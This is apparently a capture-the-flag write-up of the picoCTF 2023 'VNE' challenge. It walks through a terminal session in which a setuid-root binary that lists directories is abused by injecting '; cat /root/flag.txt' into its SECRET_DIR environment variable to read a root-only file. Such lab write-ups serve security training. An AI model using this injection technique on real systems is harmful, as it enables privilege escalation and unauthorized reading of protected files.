Points: 200
Tags: picoCTF 2023, Binary Exploitation, bash, env, injection
Author: JUNIAS BONOU
Description:
We've got a binary that can list directories as root, try it out !!
ssh to saturn.picoctf.net:61680, and run the binary named "bin" once connected.
Login as ctf-player with the password, d8819d45
Hints:
1. Have you checked the content of the /root folder
2. Find a way to add more instructions to the ls
Challenge link: https://play.picoctf.org/practice/challenge/387
We start by connecting to the server
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2023/Binary_Exploitation/VNE]
└─$ ssh -p 61680 [email protected]
The authenticity of host '[saturn.picoctf.net]:61680 ([13.59.203.175]:61680)' can't be established.
ED25519 key fingerprint is SHA256:HPhB80jvwzwsykN/XSDUt9zGDYpkIHHd9PMoDlkzWpw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[saturn.picoctf.net]:61680' (ED25519) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.19.0-1024-aws x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
ctf-player@pico-chall$ And then we look for the bin binary mentioned in the challenge description
ctf-player@pico-chall$ ls -la
total 24
drwxr-xr-x 1 ctf-player ctf-player 20 Nov 5 08:46 .
drwxr-xr-x 1 root root 24 Aug 4 22:04 ..
drwx------ 2 ctf-player ctf-player 34 Nov 5 08:46 .cache
-rw-r--r-- 1 root root 67 Aug 4 22:05 .profile
-rwsr-xr-x 1 root root 18752 Aug 4 22:05 bin
ctf-player@pico-chall$ ./bin
Error: SECRET_DIR environment variable is not set
ctf-player@pico-chall$ Note that the bin binary has the setuid bit set!
Ok, let's set the SECRET_DIR environment variable to /root as suggested in the hints.
ctf-player@pico-chall$ SECRET_DIR=/root
ctf-player@pico-chall$ ./bin
Error: SECRET_DIR environment variable is not set
ctf-player@pico-chall$ export SECRET_DIR
ctf-player@pico-chall$ ./bin
Listing the content of /root as root:
flag.txtWe can list any directory of our choice as root.
The program probable does something like ls $SECRET_DIR.
Let's try to verify this
ctf-player@pico-chall$ SECRET_DIR="-l /root/flag.txt"
ctf-player@pico-chall$ ./bin
Listing the content of -l /root/flag.txt as root:
-rw------- 1 root root 41 Aug 4 22:05 /root/flag.txtGreat, now we can inject additional commands in the variable to get the flag as suggested in the hints.
Finally, we append a cat command and an echo command to read the output more easily
ctf-player@pico-chall$ SECRET_DIR="-l /root/flag.txt; cat /root/flag.txt; echo"
ctf-player@pico-chall$ ./bin
Listing the content of -l /root/flag.txt; cat /root/flag.txt; echo as root:
-rw------- 1 root root 41 Aug 4 22:05 /root/flag.txt
picoCTF{<REDACTED>}
ctf-player@pico-chall$ And there we have the flag.
For additional information, please see the references below.